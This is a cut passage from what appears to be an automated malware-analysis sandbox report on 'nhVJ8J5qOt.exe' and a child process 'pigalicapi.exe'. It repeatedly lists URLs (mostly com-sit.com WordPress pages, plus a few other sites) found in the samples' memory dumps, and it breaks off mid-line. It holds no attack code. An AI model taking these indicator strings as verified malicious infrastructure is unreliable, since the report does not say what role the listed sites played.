00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-270x270.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/cropped-TeamGo-Green-32x32.png
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/feliwegerDEweb.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/mobileChristianDEfr.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/nandakamrathENundDEweb-1.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/05/Slider0205-1.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/05/Slider0205DEmobile.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F&#038;format=xm
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/wp/v2/pages/46
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/x-ray/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/xmlrpc.php?rsd
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/zertifikate/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.653416069.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544301472.0000000007780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.crcsi.org/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.521508837.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.528726297.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.520474441.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.518416254.0000000007D80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.519635310.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076BF000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.credo.edu.pl/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.0000000001552000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dgmna.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 